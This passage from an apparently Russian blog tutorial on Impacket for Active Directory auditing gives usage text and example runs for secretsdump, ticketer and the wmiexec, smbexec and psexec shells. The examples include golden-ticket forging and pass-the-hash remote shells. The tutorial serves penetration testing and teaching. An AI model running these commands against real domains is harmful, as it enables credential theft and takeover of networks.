\n
usage: secretsdump.py [-h] [-ts] [-debug] [-system SYSTEM] [-bootkey BOOTKEY]                       [-security SECURITY] [-sam SAM] [-ntds NTDS]                       [-resumefile RESUMEFILE] [-outputfile OUTPUTFILE]                       [-use-vss] [-rodcNo RODCNO] [-rodcKey RODCKEY]                       [-use-keylist]                       [-exec-method [{smbexec,wmiexec,mmcexec}]]                       [-just-dc-user USERNAME] [-just-dc] [-just-dc-ntlm]                       [-pwd-last-set] [-user-status] [-history]                       [-hashes LMHASH:NTHASH] [-no-pass] [-k]                       [-aesKey hex key] [-keytab KEYTAB] [-dc-ip ip address]                       [-target-ip ip address]                       target   positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>                         or LOCAL (if you want to parse local files)  optional arguments:   -h, --help            show this help message and exit   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON   -system SYSTEM        SYSTEM hive to parse   -bootkey BOOTKEY      bootkey for SYSTEM hive   -security SECURITY    SECURITY hive to parse   -sam SAM              SAM hive to parse   -ntds NTDS            NTDS.DIT file to parse   -resumefile RESUMEFILE                         resume file name to resume NTDS.DIT session dump (only                         available to DRSUAPI approach). This file will also be                         used to keep updating the session's state   -outputfile OUTPUTFILE                         base output filename. Extensions will be added for                         sam, secrets, cached and ntds   -use-vss              Use the VSS method instead of default DRSUAPI   -rodcNo RODCNO        Number of the RODC krbtgt account (only avaiable for                         Kerb-Key-List approach)   -rodcKey RODCKEY      AES key of the Read Only Domain Controller (only                         avaiable for Kerb-Key-List approach)   -use-keylist          Use the Kerb-Key-List method instead of default                         DRSUAPI   -exec-method [{smbexec,wmiexec,mmcexec}]                         Remote exec method to use at target (only when using                         -use-vss). Default: smbexec  display options:   -just-dc-user USERNAME                         Extract only NTDS.DIT data for the user specified.                         Only available for DRSUAPI approach. Implies also                         -just-dc switch   -just-dc              Extract only NTDS.DIT data (NTLM hashes and Kerberos                         keys)   -just-dc-ntlm         Extract only NTDS.DIT data (NTLM hashes only)   -pwd-last-set         Shows pwdLastSet attribute for each NTDS.DIT account.                         Doesn't apply to -outputfile data   -user-status          Display whether or not the user is disabled   -history              Dump password history, and LSA secrets OldVal  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from                         ccache file (KRB5CCNAME) based on target parameters.                         If valid credentials cannot be found, it will use the                         ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256                         bits)   -keytab KEYTAB        Read keys for SPN from keytab file  connection:   -dc-ip ip address     IP Address of the domain controller. If ommited it use                         the domain part (FQDN) specified in the target                         parameter   -target-ip ip address                         IP Address of the target machine. If omitted it will                         use whatever was specified as target. This is useful                         when target is the NetBIOS name and you cannot resolve                         it<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d smbclient<\/font><\/h3>\n
  SMB \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0434\u043b\u044f Linux \u0445\u0432\u0430\u0442\u0430\u0435\u0442. Impacket \u0438\u043c\u0435\u0435\u0442 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u0443\u044e python \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u044f, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0438 \u0432 \u0441\u0432\u043e\u0438\u0445 \u043f\u0435\u0442 \u043f\u0440\u043e\u0435\u043a\u0442\u0430\u0445:<\/p>\n
smbclient.py -no-pass -k -dc-ip 192.168.1.13 vpn.ad.ruvds.ru <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: smbclient.py [-h] [-file FILE] [-debug] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-target-ip ip address] [-port [destination port]]                     target   positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>  optional arguments:   -h, --help            show this help message and exit   -file FILE            input file with commands to execute in the mini shell   -debug                Turn DEBUG output ON  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)  connection:   -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter   -target-ip ip address                         IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to SMB Server<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d smbexec<\/font><\/h3>\n
  \u0428\u0435\u043b\u043b \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 SMB:<\/p>\n
smbexec.py ad.ruvds.ru\/admin:password@WIN-LIELOSOD7LK.ad.ruvds.ru  nt authority\\\u0441\u0438\u0441\u0442\u0435\u043c\u0430 <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: smbexec.py [-h] [-share SHARE] [-mode {SERVER,SHARE}] [-ts] [-debug] [-codec CODEC] [-shell-type {cmd,powershell}] [-dc-ip ip address] [-target-ip ip address]                   [-port [destination port]] [-service-name service_name] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-keytab KEYTAB]                   target  positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>  optional arguments:   -h, --help            show this help message and exit   -share SHARE          share where the output will be grabbed from (default C$)   -mode {SERVER,SHARE}  mode to use (default SHARE, SERVER needs root!)   -ts                   adds timestamp to every logging output   -debug                Turn DEBUG output ON   -codec CODEC          Sets encoding used (codec) from the target's output (default \"utf-8\"). If errors are detected, run chcp.com at the target, map the result with                         https:\/\/docs.python.org\/3\/library\/codecs.html#standard-encodings and then execute smbexec.py again with -codec and the corresponding codec   -shell-type {cmd,powershell}                         choose a command processor for the semi-interactive shell  connection:   -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter   -target-ip ip address                         IP Address of the target machine. If ommited it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to SMB Server   -service-name service_name                         The name of theservice used to trigger the payload  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -keytab KEYTAB        Read keys for SPN from keytab file<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d ticketConverter<\/font><\/h3>\n
  \u041a\u043e\u043d\u0432\u0435\u0440\u0442\u043e\u0440 \u0444\u043e\u0440\u043c\u0430\u0442\u0430 \u0431\u0438\u043b\u0435\u0442\u043e\u0432 \u043c\u0435\u0436\u0434\u0443 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Linux \u0438 Windows. \u0412\u044b\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c \u0431\u0438\u043b\u0435\u0442:<\/p>\n
python3 ticketer.py -nthash 1596ef...c8 -domain-sid S-1-5-21-1377681614-1103095939-2089592296 -domain ad.ruvds.ru raj <\/code><\/pre>\n
  \u0414\u043b\u044f \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0435\u043d\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u044d\u0442\u0438\u043c \u0431\u0438\u043b\u0435\u0442\u043e\u043c \u0438\u0437-\u043f\u043e\u0434 Linux \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043a\u043e\u043d\u0432\u0435\u0440\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435:<\/p>\n
python3 ticketConverter.py raj.ccache ticket.kirbi  KRB5CCNAME=ticket.kirbi <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: ticketConverter.py [-h] input_file output_file   positional arguments:   input_file   File in kirbi (KRB-CRED) or ccache format   output_file  Output file  optional arguments:   -h, --help   show this help message and exit<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d ticketer<\/font><\/h3>\n
  \u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c TGS \u0438\u043b\u0438 TGT (\u0437\u043e\u043b\u043e\u0442\u043e\u0439 \u0438\u043b\u0438 \u0441\u0435\u0440\u0435\u0431\u0440\u044f\u043d\u044b\u0435 \u0431\u0438\u043b\u0435\u0442\u044b). \u0422\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0432\u044b\u043f\u0438\u0441\u0430\u0442\u044c TGT \u0434\u043b\u044f \u0432\u044b\u0434\u0443\u043c\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f raj<\/i>, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0445\u0435\u0448 \u0441\u043b\u0443\u0436\u0435\u0431\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 krbtgt<\/i>:<\/p>\n
python3 ticketer.py -nthash 1596ef...4c8 -domain-sid S-1-5-21-1377681614-1103095939-2089592296 -domain ad.ruvds.ru raj [*] Creating basic skeleton ticket and PAC Infos [*] Customizing ticket for ad.ruvds.ru\/raj [*]     PAC_LOGON_INFO [*]     PAC_CLIENT_INFO_TYPE [*]     EncTicketPart [*]     EncAsRepPart [*] Signing\/Encrypting final ticket [*]     PAC_SERVER_CHECKSUM [*]     PAC_PRIVSVR_CHECKSUM [*]     EncTicketPart [*]     EncASRepPart [*] Saving ticket in raj.ccache <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: ticketer.py [-h] [-spn SPN] [-request] -domain DOMAIN -domain-sid DOMAIN_SID [-aesKey hex key] [-nthash NTHASH] [-keytab KEYTAB] [-groups GROUPS] [-user-id USER_ID]                    [-extra-sid EXTRA_SID] [-duration DURATION] [-ts] [-debug] [-user USER] [-password PASSWORD] [-hashes LMHASH:NTHASH] [-dc-ip ip address]                    target   positional arguments:   target                username for the newly created ticket  optional arguments:   -h, --help            show this help message and exit   -spn SPN              SPN (service\/server) of the target service the silver ticket will be generated for. if omitted, golden ticket will be created   -request              Requests ticket to domain and clones it changing only the supplied information. It requires specifying -user   -domain DOMAIN        the fully qualified domain name (e.g. contoso.com)   -domain-sid DOMAIN_SID                         Domain SID of the target domain the ticker will be generated for   -aesKey hex key       AES key used for signing the ticket (128 or 256 bits)   -nthash NTHASH        NT hash used for signing the ticket   -keytab KEYTAB        Read keys for SPN from keytab file (silver ticket only)   -groups GROUPS        comma separated list of groups user will belong to (default = 513, 512, 520, 518, 519)   -user-id USER_ID      user id for the user the ticket will be created for (default = 500)   -extra-sid EXTRA_SID  Comma separated list of ExtraSids to be included inside the ticket's PAC   -duration DURATION    Amount of days till the ticket expires (default = 365*10)   -ts                   Adds timestamp to every logging output   -debug                Turn DEBUG output ON  authentication:   -user USER            domain\/username to be used if -request is chosen (it can be different from domain\/username   -password PASSWORD    password for domain\/username   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter  Examples:         .\/ticketer.py -nthash <krbtgt\/service nthash> -domain-sid <your domain SID> -domain <your domain FQDN> baduser          will create and save a golden ticket for user 'baduser' that will be all encrypted\/signed used RC4.         If you specify -aesKey instead of -ntHash everything will be encrypted using AES128 or AES256         (depending on the key specified). No traffic is generated against the KDC. Ticket will be saved as         baduser.ccache.          .\/ticketer.py -nthash <krbtgt\/service nthash> -aesKey <krbtgt\/service AES> -domain-sid <your domain SID> -domain <your domain FQDN> -request -user <a valid domain user> -password <valid domain user's password> baduser          will first authenticate against the KDC (using -user\/-password) and get a TGT that will be used         as template for customization. Whatever encryption algorithms used on that ticket will be honored,         hence you might need to specify both -nthash and -aesKey data. Ticket will be generated for 'baduser'         and saved as baduser.ccache<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d wmiexec<\/font><\/h3>\n
  \u0415\u0449\u0451 \u043e\u0434\u0438\u043d \u0448\u0435\u043b\u043b \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 WMI (Windows Management Instrumentation<\/a>):<\/p>\n
python3 wmiexec.py -hashes :ee2...3f ad.ruvds.ru\/admin@192.168.1.13  [*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\\> <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-silentcommand] [-debug] [-codec CODEC] [-shell-type {cmd,powershell}] [-com-version MAJOR_VERSION:MINOR_VERSION]                   [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]                   target [command ...]   positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>   command               command to execute at the target. If empty it will launch a semi-interactive shell  optional arguments:   -h, --help            show this help message and exit   -share SHARE          share where the output will be grabbed from (default ADMIN$)   -nooutput             whether or not to print the output (no SMB connection created)   -ts                   Adds timestamp to every logging output   -silentcommand        does not execute cmd.exe to run given command (no output)   -debug                Turn DEBUG output ON   -codec CODEC          Sets encoding used (codec) from the target's output (default \"utf-8\"). If errors are detected, run chcp.com at the target, map the result with                         https:\/\/docs.python.org\/3\/library\/codecs.html#standard-encodings and then execute wmiexec.py again with -codec and the corresponding codec   -shell-type {cmd,powershell}                         choose a command processor for the semi-interactive shell   -com-version MAJOR_VERSION:MINOR_VERSION                         DCOM version, format is MAJOR_VERSION:MINOR_VERSION e.g. 5.7  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -dc-ip ip address     IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter   -A authfile           smbclient\/mount.cifs-style authentication file. See smbclient man page's -A option.   -keytab KEYTAB        Read keys for SPN from keytab file<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
\u258d psexec.py<\/font><\/h3>\n
  \u0418 \u0437\u0430\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0448\u0435\u043b\u043b \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u043e\u0433\u043e \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0433\u043e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430 psexec<\/i>:<\/p>\n
psexec.py ad.ruvds.ru\/admin@WIN-LIELOSOD7LK.ad.ruvds.ru -k -no-pass  [*] Requesting shares on 192.168.1.13..... [*] Found writable share #Temp [*] Uploading file cKOWdoIN.exe [*] Opening SVCManager on 192.168.1.13..... [*] Creating service LIAB on 192.168.1.13..... [*] Starting service LIAB..... C:\\> <\/code><\/pre>\n
  <\/p>\n
                         \u0421\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441:<\/b>                         <\/p>\n
\n
usage: psexec.py [-h] [-c pathname] [-path PATH] [-file FILE] [-ts] [-debug] [-codec CODEC] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-keytab KEYTAB]                  [-dc-ip ip address] [-target-ip ip address] [-port [destination port]] [-service-name service_name] [-remote-binary-name remote_binary_name]                  target [command ...]   positional arguments:   target                [[domain\/]username[:password]@]<targetName or address>   command               command (or arguments if -c is used) to execute at the target (w\/o path) - (default:cmd.exe)  optional arguments:   -h, --help            show this help message and exit   -c pathname           copy the filename for later execution, arguments are passed in the command option   -path PATH            path of the command to execute   -file FILE            alternative RemCom binary (be sure it doesn't require CRT)   -ts                   adds timestamp to every logging output   -debug                Turn DEBUG output ON   -codec CODEC          Sets encoding used (codec) from the target's output (default \"utf-8\"). If errors are detected, run chcp.com at the target, map the result with                         https:\/\/docs.python.org\/3\/library\/codecs.html#standard-encodings and then execute smbexec.py again with -codec and the corresponding codec  authentication:   -hashes LMHASH:NTHASH                         NTLM hashes, format is LMHASH:NTHASH   -no-pass              don't ask for password (useful for -k)   -k                    Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use                         the ones specified in the command line   -aesKey hex key       AES key to use for Kerberos Authentication (128 or 256 bits)   -keytab KEYTAB        Read keys for SPN from keytab file  connection:   -dc-ip ip address     IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter   -target-ip ip address                         IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name and you cannot                         resolve it   -port [destination port]                         Destination port to connect to SMB Server   -service-name service_name                         The name of the service used to trigger the payload   -remote-binary-name remote_binary_name                         This will be the name of the executable uploaded on the target<\/code><\/pre>\n<\/div><\/div>\n
  <\/p>\n
3. \u0417\u0430\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u0435<\/font><\/h2>\n
  \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u043d\u0430 \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u0435\u043d\u0438\u0435 22 \u0441\u043a\u0440\u0438\u043f\u0442\u043e\u0432 \u0438\u0437 \u0441\u043e\u0441\u0442\u0430\u0432\u0430 Impacket, \u043f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u043d\u044b\u0445 \u0434\u043b\u044f \u0430\u0443\u0434\u0438\u0442\u0430 Active Directory. \u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0441\u043f\u0440\u0430\u0432\u043e\u0447\u043d\u044b\u0439 \u043c\u0430\u0442\u0435\u0440\u0438\u0430\u043b \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u0438\u043a\u043e\u0441\u043d\u0443\u0442\u044c\u0441\u044f \u043a \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u0435\u0439\u0448\u0435\u043c\u0443 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044e \u0432 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u2013 \u0440\u0430\u0431\u043e\u0442\u043e\u0439 \u0432 Windows-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u043b\u044e\u0431\u043e\u0439 Linux-\u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432, \u0445\u043e\u0442\u044f \u044d\u0442\u043e \u0438 \u043d\u0435 \u043e\u0431\u044f\u0437\u0430\u0442\u0435\u043b\u044c\u043d\u043e, \u0432\u0435\u0434\u044c \u0438\u043d\u0442\u0435\u0440\u043f\u0440\u0435\u0442\u0430\u0442\u043e\u0440 Python \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0442\u0430\u043c. \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0432 \u0442\u0432\u043e\u0440\u0447\u0435\u0441\u043a\u0438\u0445 \u043a\u043e\u0434\u0435\u0440\u0441\u043a\u0438\u0445 \u043c\u0443\u043a\u0430\u0445, \u0438\u0437\u043e\u0431\u0440\u0435\u0442\u0430\u044f \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u044b \u0434\u043b\u044f \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0438\u043d\u0434\u0438\u0432\u0438\u0434\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0437\u0430\u0434\u0430\u0447. \u0412 \u043e\u0431\u0437\u043e\u0440\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u0438\u043a \u0430\u0442\u0430\u043a \u043d\u0430 Windows Server: Golden Ticket, Silver Ticket, Kerberoast (Kerberoasting), Asreproast (AS-REP Roasting), NTLM Relay<\/i> \u2014 \u043a\u0430\u0436\u0434\u0430\u044f \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043c\u043e\u0436\u0435\u0442 \u0431\u044b\u0442\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0438 Impacket \u0441\u0440\u0435\u0434\u0438 \u043d\u0438\u0445 \u0437\u0430\u043d\u0438\u043c\u0430\u0435\u0442 \u0434\u043e\u0441\u0442\u043e\u0439\u043d\u043e\u0435 \u043c\u0435\u0441\u0442\u043e.<\/p>\n
\u0412\u044b\u0438\u0433\u0440\u0430\u0439 \u0442\u0435\u043b\u0435\u0441\u043a\u043e\u043f \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u043f\u0440\u0438\u0437\u044b \u0432 \u043a\u043e\u0441\u043c\u0438\u0447\u0435\u0441\u043a\u043e\u043c \u043a\u0432\u0438\u0437\u0435 \u043e\u0442 RUVDS. \u041f\u043e\u0435\u0445\u0430\u043b\u0438? ?<\/a><\/font><\/b><\/p><\/blockquote>\n
<\/a><\/div>\n<\/div>\n<\/div>\n
  <\/div>\n
  
 \u0441\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b \u0441\u0442\u0430\u0442\u044c\u0438  https:\/\/habr.com\/ru\/companies\/ruvds\/articles\/743444\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
<\/div>\n
\n
\n
\n
<\/p>\n
<\/div>\n
<\/a>
  \u041f\u0440\u0438 \u0430\u0443\u0434\u0438\u0442\u0435 Windows-\u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440 Impacket<\/font><\/b> \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0448\u0432\u0435\u0439\u0446\u0430\u0440\u0441\u043a\u0438\u043c \u043d\u043e\u0436\u043e\u043c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044f \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 \u043f\u043e \u0441\u0435\u0442\u0438, \u0434\u043b\u044f \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043f\u0440\u043e\u043f\u0440\u0438\u0435\u0442\u0430\u0440\u043d\u044b\u043c (\u0440\u043e\u0434\u043d\u044b\u043c \u0438\u043b\u0438 \u0443\u043c\u043e\u043b\u0447\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u043c) \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c, \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0436\u0435, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f, PowerShell. \u041d\u043e \u0442\u0430\u043a \u0443\u0436 \u0441\u043b\u043e\u0436\u0438\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0439 \u0438\u0437-\u043f\u043e\u0434 Linux \u2013 \u043d\u0435 \u043b\u0443\u0447\u0448\u0430\u044f \u043f\u0440\u0430\u043a\u0442\u0438\u043a\u0430, \u0441 \u0443\u0447\u0451\u0442\u043e\u043c \u0438\u043c\u0435\u044e\u0449\u0438\u0445\u0441\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e open source \u0440\u0435\u0448\u0435\u043d\u0438\u0439. \u0411\u0443\u0434\u0443\u0447\u0438 \u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u0432\u043e\u0437\u043b\u044e\u0431\u043b\u0435\u043d\u043d\u043e\u043c \u0432 IT-\u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435 Python, Impacket \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u043b\u043e\u0436\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u044d\u043c\u043e\u0446\u0438\u0438 \u043e\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u0438 \u043f\u043e\u043b\u0435\u0437\u043d\u044b\u0435 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b, \u0430 \u0432 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043b\u0443\u0447\u0430\u044f\u0445 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0438 \u0432\u043e\u0432\u0441\u0435 \u043e\u043a\u043e\u043d\u0447\u0438\u0442\u044c \u0430\u0443\u0434\u0438\u0442, \u0441\u0442\u0430\u0432 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u043e\u043c \u0434\u043e\u043c\u0435\u043d\u0430. \u0426\u0435\u043b\u044c\u044e \u0441\u0442\u0430\u0442\u044c\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043a\u0430\u0437\u0430\u0442\u044c \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0440\u0430\u0441\u0441\u043c\u0430\u0442\u0440\u0438\u0432\u0430\u0435\u043c\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u0438\u043c\u0435\u0440\u0435 \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0435\u0442\u0438 \u043f\u043e\u0434 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u043c Active Directory, \u0438 \u043f\u043e\u0434\u0441\u0432\u0435\u0442\u0438\u0442\u044c \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0441\u0438\u043b\u044c\u043d\u044b\u0435 \u0435\u0433\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b. \u0424\u043e\u0440\u043c\u0430\u0442 \u0441\u0442\u0430\u0442\u044c\u0438 \u2013 \u043e\u0431\u0437\u043e\u0440 